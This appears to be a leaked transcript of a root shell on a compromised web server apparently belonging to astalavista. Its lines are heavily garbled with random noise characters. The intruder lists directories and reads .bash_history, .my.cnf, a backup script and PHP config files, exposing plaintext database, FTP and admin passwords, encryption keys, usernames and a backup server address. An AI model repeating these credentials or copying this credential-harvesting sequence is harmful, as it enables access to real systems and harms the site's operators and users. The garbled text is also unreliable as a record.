#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #2 t7 Q3 v$ } g% h
# |__| [__ | |__| | |__| | | | [__ | |__| #, V" D4 x, E& K A4 [* Q) Z1 K0 u
# | | ___] | | | |___ | | \/ | ___] | | | #5 {" ]0 @% U5 l4 Y: o7 L; r
# #
0 L- c# Q& {# ^& P% g2 k2 h#####################################################
8 l! j( \6 U6 f6 P4 D# #
1 V% d6 q$ d1 C8 K0 h( D) l+ A0 V8 ]+ Y# Admin Contact - 链接标记support@secureservertech.com #; j( b8 G) v* _* G$ i
# #+ C# |) {0 f- X/ g
# Available ShortCuts #
0 e5 R, T$ G8 n. W# #6 _/ C8 z) Y& P; B
# nst - list active connections #: p, d; a, l V7 G' p
# ddos - shows how many times each ip is connected #9 c% [# ^! d5 z3 L3 q% [
# ltr - restart the webserver #* n, S, a4 C% n0 d: M( W
# phpc - edit the php config file #5 h+ L2 D! k w* j
# htc - edit the webserver configuration file #
9 l2 ~/ k: V! c9 p0 T# U7 p# up - uptime #5 h" J( l. Z+ l, y9 \( ~
# etd - edit the motd of the day file #
4 X: h" w j$ K/ R4 u, p# htr - start and restart apache if needed ## {# z# M6 v3 C$ v
# syng - shows active SYN_RECV connections #$ N" W( H1 z3 v4 Y6 Q
# synd - syn flood blocker - “synd -h” for usage #
% J+ f" g0 m2 N0 T1 L! O' x- a8 q#####################################################
q" D8 o( _8 I/ A3 }& L# NOTES: #
8 t5 t9 k+ a3 ]7 C# Z5 J2 r# Last Upgrade - 12-08-2008 by JF #
2 K/ N/ t) @# L: q0 A( g0 b# My.cnf/Mysql Optimization - 1-28-09 ## Z# a3 u' o; b* v
# #+ A% w/ `7 d( n! G5 w% z8 e
# #0 E' b: o* K! a) Q" g, W5 @. e3 b
# #
' e4 n6 ^5 a, i& G0 I, m: W#####################################################
) U% g, X3 p4 ^3 j: E7 s$ R; M' M: y8 q6 c
sh-3.2# lastlog | grep -v Never
5 U0 ~& ^2 O- v3 U: ?Username Port From Latest8 e- \+ _ v' A+ j
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009. K# x) H2 ~2 ^2 B
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008% y" g/ X. h+ Z* N2 E
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
, N& O' g; }# Z0 I2 b9 Sastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20095 c' u* [( u- v( Z
" b6 O) h" m! Q9 q5 ~ a* zsh-3.2# ls -la8 p% Z* l9 \ d; l
total 453376
- l9 p$ {6 o; ~drwxr-x— 15 root root 4096 Jun 4 08:40 .6 v# S* T6 t* X* V6 U' @
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. H% h) R$ r% r% K
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip8 U0 t0 ^6 T8 T( [ X8 M% \ ?3 I
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg2 r) W# t4 z0 C, T8 s( I
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history$ J& L. \! W% h5 B
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
' u \" q, v4 Y1 A/ N- Z* ~, ]9 u-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
+ g" G, ]5 S+ f9 f-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc/ h2 }( V: |; ]
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh& ~9 ]& ^ Z0 ?: Y0 q
-rw-r–r– 1 root root 1327 Nov 29 2007 cert& S# |; R5 M& O& z, G3 i
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
; Y; V' t0 X- K8 W, h/ [drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
+ l: d! ~: h5 `# N- R1 K/ x; w7 \-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc7 q& f9 n8 J! Q
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
4 l5 _+ p& s2 K+ I( T$ B( {drwx—— 2 root root 4096 Oct 28 2007 .elinks3 B9 A) _9 X0 o
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
% z7 Y0 o1 {% |" U6 H% Z-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2% ]7 ?+ d4 {$ w7 _! g
-rw——- 1 root root 0 Apr 16 13:19 .history
' P( z" t$ v6 q; d+ Y2 I$ Y4 w-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
: f+ U# M& }0 K' G-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
1 H0 w2 [6 _; b6 V# `) l5 y+ Y-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
7 i$ Q: I/ e& {% d5 R0 \5 |" }-rw——- 1 root root 35 Jun 2 14:23 .lesshst p8 M' g& |. r5 z8 \: }
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp9 | W& H, g0 z# Q Y$ y/ V
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec5 x6 G1 t2 [! M. x6 f( |
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz0 h- S H: M- {+ [9 C5 q
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2% ?9 _" J6 Z- O' B S# x& B
-rwx—— 1 root root 760 Sep 18 2008 lp
1 m. l, A7 @; y0 }: }0 Gdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1; O" a2 r) j# T. m3 G0 ^
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz- w) V; a8 k/ z; `3 e4 l1 z* g
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.16 }9 F2 W6 W) r9 U$ e" f1 ^
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
& |, e; x& F) d# m-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
: {4 _0 S2 G6 I: |4 v$ a1 kdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
; Z& c M! X6 N3 z-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz( {' t* h9 [) S
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh8 _; m% i4 M/ N# m9 s
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
. c; p! u+ k+ V9 M+ G' P-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history" f1 I6 t, c8 f% y2 S* X$ C# A7 M h
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
/ }* `. H& ^. s+ T-rw——- 1 root root 41 May 20 2008 .mytop
5 T/ ^8 h4 t4 r y7 vdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.69 b, {% X8 q7 j
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz% H5 a/ I* S& y2 w! V+ `' b( \9 t
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
7 a+ {' F: L2 u, V7 p-rw——- 1 root root 1462 Sep 21 2007 opt.php4 s/ ^# N6 C( b7 r, l6 W D
-rw-r–r– 1 root root 3371 Sep 22 2007 p! W8 u$ x4 B7 r# F2 x& i4 _, D
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
2 w3 e2 F. \ i2 W: L-rw——- 1 root root 1024 Feb 3 21:32 .rnd
+ d2 F% s. d7 D: g1 t-rw-r–r– 1 root root 716 Nov 28 2007 server.csr5 _( x5 P1 A' r
-rw-r–r– 1 root root 887 Nov 28 2007 server.key7 A: W7 U V8 P* Z
drwx—— 2 root root 4096 Oct 10 2008 .ssh# @6 {$ w# |4 e* T0 l
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
9 B. z% P0 v/ g ^% w; p$ ]) h-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc1 O2 @2 L1 P5 V; L
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip7 Y) Z+ l2 ]+ D5 ?
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
! I' w0 @7 }/ R( @6 L- t$ [drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp: G3 ?* t# T P
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
2 Y8 W# N1 J( \; C( u" g6 G+ R# Udrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0: q8 ~( `5 s% {, D( V* g
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2" \( I$ |# |: o p/ {; h' i
-rw——- 1 root root 12997 May 16 2008 .viminfo
5 m. Q7 f2 _+ h; e/ l; [; b3 a+ v" e! \9 ?' J" l" P5 w, K4 z" _
sh-3.2# cat .bash_history" ?" @$ X1 {& I: ^; M1 h$ X
[snip]
2 g; d) a8 g) b- O. v3 Cwget cp4sst.com/sstlinux.tar.gz
! w* r2 X7 }0 p. [7 Ktar zxvf sstlinux.tar.gz& C. d$ k' A d
cd linux-2.6.27.10
7 a! {. J/ e/ d$ `' @. W6 H! O; ~sh install.sh
* X; D6 ~6 V* D' I+ z5 Mmake bzImage ; make modules ; make modules_install ; make install- ?( Z0 Z% ]; \! F# |
make clean
9 ?. M N' U! d Jservice mysqld restart% F# ]! |" ]7 r
[snip]; E; Z( ~8 R( G5 D! I" I0 T" n
cd /usr/sbin/7 s. Y2 c- S' M! ]
chmod 4777 traceroute
$ X6 r3 b4 i, |7 @4 c& M2 k0 ochmod 4777 ping
4 t+ h, q7 T* otraceroute -I 链接标记[url]www.astalavista.ch[/url]
5 h% P7 }$ T. ^[snip]1 W; t: O! S! d5 Y8 b6 p
vi /etc/csf/csf.conf
: [7 g* x! j; e( d0 htraceroute google.ch
* d5 H7 k- j7 y; u8 M% `) K$ Gservice csf restart
8 S `- Q( p8 }" i% K" r( H. m# Utracert google.ch
2 j, i( I& N' d+ D* [& B$ i5 o% `0 lservice csf restart
2 W0 N4 n6 k# K5 d: Straceroute 链接标记[url]www.google.ch[/url]
9 ^9 e# ?; g y2 ntracert 链接标记[url]www.google.ch[/url]
% \' {; n1 S( X: {+ H8 P/ atraceroute 链接标记[url]www.google.ch[/url], L* u+ @* L* @
locate traceroute
! A5 \( H1 O, c: V, g. Ichown 4755 /bin/traceroute# U1 d% D1 v* N2 _ [, r$ i
chown 4777 /bin/traceroute
7 D5 ]: Z1 e+ v9 Clocate ping$ f6 M/ f% ^9 K6 ?7 X) Q& ]/ e2 `
chown 4755 /bin/ping
7 E, U4 v; }" \9 c& Uchown 4777 /bin/ping0 w1 L9 E U* a# H1 L
cd /bin/
0 ?$ F( h( B4 U; L6 l/ z1 vls -ali | grep ping
& I$ F/ o2 Z( n) C& Dchown root ping
: S! m. a- Z. I" L0 V8 s% N7 f Bchmod 4755 ping
. t, |5 q6 ]0 J/ ^1 B# Wls -ali | grep traceroute2 U, Q- m1 n- X# \
chown root traceroute
, h& L, K5 A% x! O+ ~' q& @chmod 4755 traceroute" p8 U8 [: K' m$ k1 J
ls -ali | grep traceroute
+ X- G: U/ M( Z4 K8 o5 @traceroute -I 链接标记[url]www.google.ch[/url]
1 M/ x3 D U5 v s4 }/ t+ q/ Etraceroute 链接标记[url]www.google.ch[/url]
+ W( V+ [6 z6 Kwhois pmsantos.ch
/ _* }# a4 Y( u7 A* ^: b[snip], D7 R) {* S; N- |* f6 [
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
+ Z/ z3 s; m6 d* [; |6 ~mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
( H+ P% ^. c7 k* ^" Z% ]mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql, U1 ? h" A' j- @) T- E+ p
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql" P! `. y5 ]0 U' x6 m
top
4 d- W N2 \8 P/ L* N! Aping ssth.ch
+ A' a" X, Y, K" I# U" e1 lping asdlkfaljgasd???ljg???lasj.ch/ H& U& X/ M. @# N; b* ~2 l
ping asdlkfaljgasdlasj.ch
3 C- T5 t$ F2 w2 @7 B6 |ping 链接标记[url]www.ssth.ch[/url]- z! [0 B/ |* u& e9 }, P! j
ping ssth.ch% J/ ]9 y% Z( i: x: d
nslookup 链接标记[url]www.google.ch[/url]1 r/ Y7 h) A( i5 y" R% T; t% E
nslookup 链接标记[url]www.ssth.ch[/url]
. _% `0 \0 k$ `$ bman nslookup
8 z, `$ Z+ l) ]/ Dping 链接标记[url]www.google.ch[/url]
$ A5 i6 Y2 R* }! I3 N4 t! d. Fnslookup 链接标记[url]www.google.ch[/url]
3 u S6 g' n) d8 z* Ynslookup 链接标记[url]www.google.ch[/url], i: u" A! w+ p' q' @; P9 y
nslookup salfjasdlf.ch
4 R( i+ f% F% n8 U. N[snip]4 L/ w/ A u% a) X/ f" ^( x" Y
openssl passwd -1 sadf
2 u* [) w3 P) ?: ^( ~* Copenssl passwd -1 5cZNHstdTy; A, c) l) W8 L( u. }
mysql& T3 j- {; U0 f+ }
mysql
, t \6 ]+ S" ulocate proftp/ P% `+ s5 u- K. D t( T: i7 E
vi /etc/proftpd.passwd
5 c. N7 W. d/ E" N% Cservice proftpd restart k( M* |9 a9 r8 r' a; k0 N4 e
locate proftpd.conf/ c% J6 e3 X4 k. o2 P" h
vi /etc/proftpd.conf) |. o, F- t% T) s5 U- Q8 N
vi /etc/proftpd.passwd2 s7 e; m2 l3 }) q5 [6 O5 Y2 [" \2 w
service proftpd restart, l5 {% u4 r$ D k
[snip]( a d4 U* G- x; g% X$ E
/bin/sh /home/com/backup_system/backup.sh
6 n/ P4 d; c! Q! T: d: L' ctar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
& f; a2 K1 i! [+ \: ]" x! @mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql- X5 r/ }& I6 y s4 t$ ~
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
5 C% U4 S* D4 }3 l" O' els -ali$ ^# }3 e7 n. u( c
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
( R3 a( k& `9 K2 F/ Emysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
- } Z, c+ t2 f/ {7 o8 f' a8 Y, Kcrontab -l
4 b- w3 ~% b2 f# g: z, A. Hcrontab -l
! A" J) ^. c& P/ Gphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
2 [ j7 F* ]3 j' i9 ^6 }) O2 S6 V0 p/home/com/public_html/modifications/cronjobs/exploits.sh
/ U% ^' l# ]2 ]wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]' v* I1 v/ |# ^9 X. t
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz. I) t3 |& ]! l1 t; U
cd lsws-4.0.3
1 E! E* j7 h& y) ]sh install.sh
- c/ K3 [! F7 `! Y! l) c* ~uptime
8 _. w& y. Z4 u+ r6 D: Ahdparm -tt /dev/sda0 D% O1 }% |$ O" k+ c6 h' D
iostat
: ] R. t& k2 S5 Z! E Kyum install iostat
- Y: D' p7 s% Y3 Z* m) Hiostat H& U' L3 H+ y, y1 M$ g4 E1 I% V
whereis iostat( `0 @" p9 f- s* j7 I- n K
yjm clean all
& E3 M; D/ P% \) N; p: ]; Wyum clean all ; yum -y update+ {. ?$ p+ E2 X
iostat
4 h% M* g1 i9 ]) Q! ?' G! Xyum install systat
1 {6 K# F; G4 y' _! I% e3 Drpm -qa | grep iostat
; |. E& V6 m/ ~4 B P+ v1 Mrpm -qa | grep sysstat
, U4 k+ M% n) k, Q. i) y/ p& e$ _9 qrpm -qa | grep systat
- y( @. \$ Z' A# m$ A' r( \dmesg -c
8 h/ M2 C- m: o/ X" _sysctl -p
' \: E2 _/ v( e- q" c/ Runame -r8 k& W& | y$ c8 V! S- w' C4 U/ k S
cd /usr/src9 G1 k3 J2 g) C( }" K/ D# c! `
wget nix101.com/kernels/sstlinux.tar.gz9 e( p, R4 |% Y0 n( I$ l& k7 e
shutdown -r now
/ {0 s+ Y' O T1 m# c4 d+ b. ]nano -w /boot/grub/grub.conf' a/ \5 l; n: r7 I! P. g
- }4 }) k Q2 k5 ^3 N; qsh-3.2# cat .my.cnf
! u$ z2 `3 f( ^% K2 R9 }% ][client]
6 {3 a) v# B; \' ~2 x/ guser=da_admin
! G( ~! \- R) G( S kpassword=X9dctmRH' c5 n4 r1 c) L3 o: t
6 W3 M* k& P& Q' \; }- Z' L* fsh-3.2# cat /home/com/backup_system/backup.sh# c% \+ S- z' `3 \- m( ^/ H
#!/bin/sh) j; ~0 F, \3 l3 k+ |% t( |
###################################################################### r8 B; p5 h2 v% q0 o% X
# #- [& o7 g. V1 x
# incremental backup for astalavista.com #
% j' i2 _4 S7 m4 u9 [2 s6 u0 L" S# #& Z; l+ d. d) ~1 K% F& Y+ D
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #7 `8 }# Y: f( Q7 `) S
# #
- u |& v: W7 j3 p6 T: U, V7 U#####################################################################
7 Z: E( h- E! A6 Q: B[snip]9 w, n: o H. c1 e2 M" s
PROG_DIR=”/home/com/backup_system”;
Q$ B4 A4 A) F$ P, ~BACKUP_DIR=”/home/com/backups”;& g+ d! z9 u! m0 ^/ \
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;' X7 a7 L4 W* t, z, k" ?
# ftp for synology backup server
' n {, E8 E( r: AFTP_HOST=”212.254.194.163″;
+ k5 R$ S8 T* \. EFTP_PORT=”21″;: Z9 x. L2 {8 r$ t7 Z
FTP_USER=”astalavista.com”; |+ T( l* t2 B9 h' E% O
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;3 O! A2 L, S& u& R/ d9 c
FTP_DIR=”/astalavista.com”;, I" Q8 _$ }8 [
# database7 t3 h" x; w v& S9 s
DB_HOST=”localhost”;1 k. ?9 f# {& o5 N
DB_USER=”contrexxuser2″;* `$ `4 X: r E, C" p
DB_PASS=”0fEYNZgXz1pKe”;% ~# S8 Q2 F$ t0 z" V% r% ~
DB_DATABASE1=”com_contrexx2_live”;/ U, m) I7 X- `1 e2 x: G9 n
DB_DATABASE2=”com_contrexx2″;& V! t+ s2 @+ ?3 `7 u4 ^; H) v' [- ?
[snip]% Q! t( [5 u v6 [2 q
ftp -in $FTP_HOST $FTP_PORT <<EOF. x+ @$ X/ X" G( R: J& W* b
quote USER $FTP_USER
8 V! V& V+ E; T9 Y3 B" Kquote PASS $FTP_PASS
4 A' N# _! |# f( e! scd $FTP_DIR
2 t' C+ [8 g0 h: Cput $DB_FULLNAME-SQL_Dump.tar
& G' N1 h; x4 A w+ Xput $BACKUP_FULLNAME-Public_HTML.tar
% B' q9 {+ j1 m: H; b- _8 h2 Pclose
m5 }3 |1 f; [1 c2 kbye- a( J2 b: I+ q% ^
EOF
( L* h# U* ~( s H7 U1 s4 v/ F" [& d1 m5 B+ h# @8 S/ l: M) x
sh-3.2# cd /home
# b( i" }# f6 f' I4 {sh-3.2# ls -la
) R. y. T! n! Z9 g! I0 K( Itotal 120$ s4 X- Q% x, S/ f
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
- P4 @, ~% S8 _4 ^% S" {9 Rdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
: l, C4 ^* q- n% U( t( ^8 @5 ydrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
7 O$ c& g8 d! M-rw——- 1 root root 8192 Jun 4 03:03 aquota.group( x% a4 e% q5 e% ^
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user7 z; W- ?" d4 k# i9 p! ?" g
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
- b* i* Y5 {! ?drwxr-xr-x 2 root root 4096 Jul 29 2008 backup! ?1 `* \5 O- w
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
$ v$ `# R1 B" E, vdrwx–x–x 10 com com 4096 Apr 28 12:40 com
7 L* l" }7 j9 T- _) O8 Wdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
+ r- F$ j" `" V' Pdrwx—— 3 jon jon 4096 Sep 21 2007 jon
+ q) H+ l0 c! h8 L$ a& Pdrwx—— 2 root root 16384 Sep 11 2007 lost+found
+ A4 [% o: |& [8 {/ l0 a& @# edrwxr-xr-x 2 root root 4096 Sep 14 2007 my) u. |# r i1 j* v$ v. s( Z/ ?0 Y
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
7 R4 N( e0 s5 x9 x$ q6 tdrwx—— 2 jon jon 4096 Sep 15 2007 test
: `( p" W* U, ^! gdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
" t6 F/ Z0 t2 o2 S; A: F& c0 L4 e Y% n
sh-3.2# cd admin& }6 i& L# c$ O. t& z+ T* x
sh-3.2# ls -la& t3 J5 M0 l# d; b! e7 c. n
total 1735896
I+ W8 p, }% c: E/ G/ Ndrwx–x–x 9 admin admin 4096 Nov 28 2007 .
2 d' F: v% @4 T% ]drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..6 S2 p. w" U2 {* U# S1 ~+ L
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups% m* B6 h- |9 C" {
drwx—— 2 admin admin 4096 Sep 28 2007 backups( [* `8 d! _4 z. @( V
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history: L9 u8 Z9 \. A9 u
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
2 e6 k; F) u/ \' l+ w& C3 ~- ^-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile( F! H3 l/ V& N5 @& M
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc% Q- u: t) }- L0 T. y9 U; s& b
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups' d! E" ~" X* N; c5 _
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains# v2 G$ l& ^! J, {* T7 ]3 ^
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap0 x! V6 z$ j1 \) y& N# W8 g% Z
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
3 Z3 Y, M" o& Mdrwx—— 2 admin admin 4096 Sep 21 2007 mail( G7 U2 P- y/ ^5 f& P" u' E, E
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr) \) q& d6 f( J, ~/ @
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
O: j( n8 M/ r& Y-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow7 \' t) [7 c6 F4 f
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz1 Z, l9 Z @+ f( f6 u
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
' D3 a# u, @9 Q; N5 f) u
. S @' N8 @9 i* }" Y! ]4 Ash-3.2# ..
8 G" X5 a6 g$ l i. p, S1 K, M% Csh-3.2# cd jon
k& _* q* V1 x! B ~5 z# N" y! dsh-3.2# ls -la
5 l# ?3 M. V7 ]. {3 Y! x. Q$ |) [total 36
: R5 U' w0 O3 f) x6 @drwx—— 3 jon jon 4096 Sep 21 2007 .. `2 O& W$ n0 y# O
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..2 S+ T7 G* z$ H4 M2 j
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history* b, @; b3 [. D% T
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
2 o$ s4 Q% W# P0 y/ L1 H4 t-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile( [' X6 K8 O& G1 X
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
/ B, |, D9 Y8 s( ^-rw-r–r– 1 root root 24 Sep 21 2007 info.php
b$ l% d+ c! Y8 a4 Edrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html5 x l1 b/ R& \( I* F3 L# A1 K
$ \' R: N' o3 A; W1 ]: i6 ^- U$ x
sh-3.2# cd ..: k7 w. F- f1 M( Z, I
sh-3.2# cd test s! n, F; k- H3 g, i5 _0 H
sh-3.2# ls -la
2 s( [: @5 a& ^! a1 i& rtotal 48. w: N! ]2 z3 w) \
drwx—— 2 jon jon 4096 Sep 15 2007 .' Q9 K2 d9 X' n( Q
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..3 o: _% E' ^1 K6 i- Q7 ~
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
Y3 M+ f* D$ p" N, K/ x6 u: f-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout0 R# c: |& |- V A; F
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
/ m! y t+ v2 B4 K-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc% Y- c) t: O/ h+ l! n- P" M
sh-3.2# cat .bash_history! b; I6 K# g% U" E' R
/usr/bin/mysqladmin -u root password PoliuJhytg67
" e4 ^ }! M3 o+ T+ x& n
~4 o' s/ c! c' J: f1 ush-3.2# cd ..
% S6 I+ T. Z i; M+ ]: t& Zsh-3.2# cd astanet- r: T+ g) s& g t
sh-3.2# ls -la& h w% ]5 ~/ g h0 _
total 525 l+ ^& [3 F$ w; @5 b
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ." j. y! [+ X [3 M- K
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..$ ~1 F, T* k& V
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
- {& M$ p x! t, _; g, Q. p-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history) }6 ^& ]9 z. e7 s2 h
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
) p1 w; l1 r7 w+ H$ K, S-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile: ?9 t1 r4 y1 k
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc6 |3 h/ N9 I; D( \9 i$ g$ ]: n7 l
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains8 _1 |/ {- ]1 ]) O" H
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap& P; x1 }/ X! T S* }
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail+ W6 Q0 A* G3 }! E8 t9 [& g
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history$ c' M6 R* M( C; P. r% P
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
3 R7 Y. v1 q) B! `0 M-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
& p7 C! n% x* X: `: y6 @, A" q) B Q2 X
sh-3.2# cd auth/
3 _9 C" q4 L# [6 Fsh-3.2# ls -la
# _# E$ J, R7 t" Ltotal 28
( q& z( A% ]( }# M2 i! V/ ~/ A) Mdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .0 V" w5 U! ~# U/ |
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ../ f) I1 Y3 y$ X- n' N
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php& _7 {) ~( r. {3 X
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php, u( G- Y. v$ e: d. ^
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd" M3 N2 i, `1 x+ _; c
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
6 r( ~* b" N' M( p& A-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
6 w& o) x$ N/ N) J* m
- S6 C5 M, J1 ?. c) K& C( osh-3.2# cat hackercontest.config.inc.php
1 g4 |6 F1 x. v<?PHP
4 s8 K' F7 b3 D9 ~( Q// Variabeln f?r Verbindung zur Datenbank //
9 |% B! m3 s: h! h/ S/ F8 q' U. h$conxHost = ‘localhost’; // MySQL hostname
; N$ T. K2 [9 T' x0 Q- h$conxUser = ‘hackercontest’; // MySQL user( ` ]0 z$ A8 t. }0 _$ q
$conxPassword = ‘K6m@7dUc’; // MySQL password/ E2 R0 x% I( u
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish' t& Z/ v2 z' F& s, B5 S
?>% s2 y d0 A+ A
sh-3.2# cat hosting.config.inc.php: D6 s9 l4 Q! `* ^0 v+ H- h, E
<?PHP
# \+ r5 M3 O- z' u# o// Variabeln f?r Verbindung zur Datenbank //
7 m/ E! M$ T& t2 x! F$conxHost = ‘localhost’; // MySQL hostname5 G- @% a, s3 k) N& \* G6 @( P! s
$conxUser = ‘hostinguser’; // MySQL user8 \8 g7 X8 |6 _' M( L' r6 U
$conxPassword = ‘cXvB3981′; // MySQL password
' E; I5 C# D- i, J" H' b7 z. f0 M* D$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
% I$ {+ a3 t3 F0 W% W/ P?>
* H# N7 t- t, X9 W8 D1 [( u7 `: y$ C7 C
sh-3.2# cd ..) `+ }/ a8 S1 H
sh-3.2# cd com4 {2 }- ~( t: u5 W
sh-3.2# ls -la
! i, J3 u+ g- X! l8 ptotal 141208
5 R; i3 m8 R4 R) {drwx–x–x 10 com com 4096 Apr 28 12:40 .
